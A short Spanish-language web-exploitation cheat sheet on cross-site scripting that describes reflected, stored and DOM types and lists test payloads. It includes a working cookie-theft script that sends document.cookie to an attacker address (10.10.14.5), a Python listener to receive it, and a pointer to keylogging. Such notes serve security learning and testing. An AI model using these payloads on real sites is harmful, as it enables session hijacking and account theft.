Explotación Web
Cross-Site Scripting (XSS)
Tipos de XSS (reflejado, almacenado, DOM), payloads de prueba y robo de cookies de sesión.
1 min de lectura
Tipos
- Reflejado — el payload viaja en la petición y se refleja en la respuesta.
- Almacenado — el payload se guarda en el servidor (comentarios, perfiles).
- DOM — la ejecución ocurre en el cliente al manipular el DOM.
Payloads de prueba
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><svg onload=alert(1)>Robo de cookies
<script>
fetch('http://10.10.14.5/c?='+document.cookie)
</script>Levanta un listener para recibirlas:
python3 -m http.server 80Si la cookie tiene el flag HttpOnly, no será accesible desde JavaScript. Busca otros vectores (CSRF, keylogging).